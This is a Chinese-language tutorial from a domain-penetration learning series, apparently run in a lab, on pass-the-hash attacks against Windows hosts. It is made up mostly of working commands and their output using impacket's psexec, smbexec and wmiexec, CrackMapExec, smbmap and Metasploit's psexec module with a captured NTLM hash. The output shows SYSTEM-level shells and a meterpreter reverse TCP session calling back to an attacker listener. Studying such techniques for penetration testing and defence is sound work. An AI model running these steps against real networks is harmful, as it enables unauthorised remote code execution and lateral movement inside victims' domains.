域渗透学习（一）Windows认证机制
域渗透学习（二）Kerberos协议
域渗透学习（三）域内信息搜集
域渗透学习（四）Dump Password & Hash
域渗透学习（五）基于IPC的远程连接

PTH 哈希传递攻击

在前文Windows认证机制(网络认证 Net NTLM)章节中可以了解到，在获取了目标机器用户的NTLM Hash的情况下，可无需破解哈希直接使用目标的NTLM Hash来完成身份验证

哈希提取请参考域渗透学习（四）DUMP PASSWORD & HASH

如这里获取到的NTLM Hash 4d01fbeeaf2b706478943e0889df5622

可完成Pass The Hash的工具：

注意，PTH仍然是基于IPC远程连接实现的，所以关于账户权限，与 域渗透学习（五）基于IPC的远程连接 中提到的相同

具体参考：关于IPC连接和Psexec的用户权限问题

impacket

pip3 install impacket

• psexec.py

psexec.py -hashes :<hash> 域/域用户名@192.168.10.2

• smbexec.py

smbexec.py -hashes :<hash> 域/域用户名@192.168.10.2

PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

• wmiexec.py

PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami        Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
de1ay\administrator

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/wiki

pip2 install crackmapexec

截止到2020/3 官方程序尚未支持Python3

Windows安装需要额外安装Microsoft Visual C++ 14.0，建议*nix环境下安装

使用CrackMapExec实现Hash传递：

aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME          192.168.10.201:445 PC              [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME          192.168.10.201:445 PC              [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!)        CME          smb:445 XXXXXXXXXX      [*] Windows 10.0 Build 18362 (name:XXXXXXXXXX) (domain:XXXXXXXXXX)
CME          192.168.10.201:445 PC              [+] Executed command
CME          192.168.10.201:445 PC              de1ay\administrator
[*] KTHXBYE!

Smbmap

https://github.com/ShawnDEvans/smbmap

PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445      Name: PC
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     远程管理
        C$                                                      READ, WRITE     默认共享
        IPC$                                                    NO ACCESS       远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>

Smbmap需提供LM Hash:NTLM Hash

Metasploit

使用的是exploit/windows/smb/psexec

注意这里填入的哈希是LM Hash:NTLM Hash

       =[ metasploit v5.0.21-dev                          ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Starting persistent handler(s)...

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.10.201   yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.1     yes       The listen address (an interface may be specified)
   LPORT     7778             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 //冒号前为LM Hash 后为NTLM Hash
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM